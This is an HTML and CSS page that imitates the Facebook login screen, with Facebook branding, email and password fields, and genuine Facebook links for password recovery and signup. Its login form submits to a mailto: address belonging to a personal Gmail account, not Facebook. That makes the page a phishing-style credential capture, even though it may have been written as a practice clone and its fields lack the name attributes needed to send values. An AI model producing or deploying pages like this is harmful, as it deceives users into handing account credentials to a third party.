<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        body
        {
            background-color: whitesmoke;
        }
        h1{
            color: royalblue;
            width: 500px;
            font-size: 70px;
            margin-top: 200px;
            margin-left: 125px;
            margin-bottom: -18px;
            padding: 0px 0px 0px 0px;
        }
        p
        {
            font-size: 30px;
            width: 500px;
            margin-left: 125px;
            font-style: normal;
            font-family: inherit;
        }
        div{
            background-color: white;
            width: 400px;
            height: 400px;
            margin-left: 700px;
            margin-top: -300px;
        }
        input
        {
            margin-top: 20px;
            margin-left: 20px;
            width: 360px;
            height: 50px;
            font-size: 18px;
            border-color: whitesmoke;
            border-style: solid;
        }
        #subm
        {
            background-color: blue;
            margin-bottom: 20px;
        }
        #forpass{
            margin-left: 130px;
            text-decoration: none;
        }
        hr
        {
            width: 360px;
        }
        button
        {
            width: 200px;
            height: 40px;
            border-color: rgb(56, 154, 56);
            background-color: rgb(56, 154, 56);
            margin-left: 100px;
        }
    </style>
</head>
<body>
    <h1>facebook</h1>
    <p>Facebook helps you connect and share <br>
        with the people in your life.</p>
    <div>
        <form action="mailto:rishikeshwareddyj2003@gmail.com" method="post">
            <input type="email" placeholder="Email address" id="emailid">
            <br>
            <input type="password" placeholder="password" id="pass">
            <br>
            <input type="submit" value="Log in" id="subm">
            <br>
        </form>
        <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" id="forpass">Forgotten Password?</a>
        <br>
        <hr>
        <br>
        <button><a href="https://www.facebook.com/" style="text-decoration: none; font-size: larger;">create new account</a></button>
    </div>
</body>
</html>